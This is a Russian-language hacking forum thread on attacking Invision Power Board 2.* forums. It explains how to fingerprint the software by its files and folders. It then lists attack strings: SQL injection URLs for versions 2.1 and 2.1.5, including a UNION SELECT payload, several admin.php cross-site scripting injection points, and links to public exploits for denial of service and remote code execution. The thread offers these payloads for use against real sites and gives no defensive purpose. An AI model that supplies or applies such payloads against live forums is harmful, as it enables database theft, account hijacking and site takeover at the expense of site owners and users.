Общайся на любые темы!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Общайся на любые темы! » Хакинг / F.A.Q » Invision Power Board v. 2.* :


Invision Power Board v. 2.* :

Сообщений 1 страница 4 из 4

1

Invision Power Board v. 2.* :
Для определения версии этого форума определяется наличием файлов и папок:

файлы: папки:
info.php /ips_kernel/PEAR/

После того как убедились что версии форума Invision Power Board 2.*,
можно воспользоваться уязвимостями и сплоитами:

SQL-INJECTION:

[Invision Power Board v. 2.1]

Свернутый текст

http://[target]/index.php?act=Search&nav=lv&CODE=show&
searchid={SESSION_ID}&search_in=topics&result_type=topics&hl=&st=20[SQL code]/*

0

2

[Invision Power Board 2.1.5]

Свернутый текст

act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1)
UNION SELECT 1,3/*&tact=delete

0

3

XSS:

Свернутый текст

http://[target]/upload/admin.php?
adsess=[xss]&act=login&code=login-complete

Свернутый текст

http://[target]/upload/admin.php?adsess=
[id]&section=content&act=forum&code=new&name=[xss]

Свернутый текст

http://[target]/upload/admin.php?
name=[xss]&description=[xss]

0

4

Spl0its:

Свернутый текст

Army System Mod 2.1 http://www.milw0rm.com/exploits/1492
Invision Power Board 2.1.4 (Dos) http://www.milw0rm.com/id.php?id=1489
Invision Power Board <=2.1.5 (Remote code execution)

0


Вы здесь » Общайся на любые темы! » Хакинг / F.A.Q » Invision Power Board v. 2.* :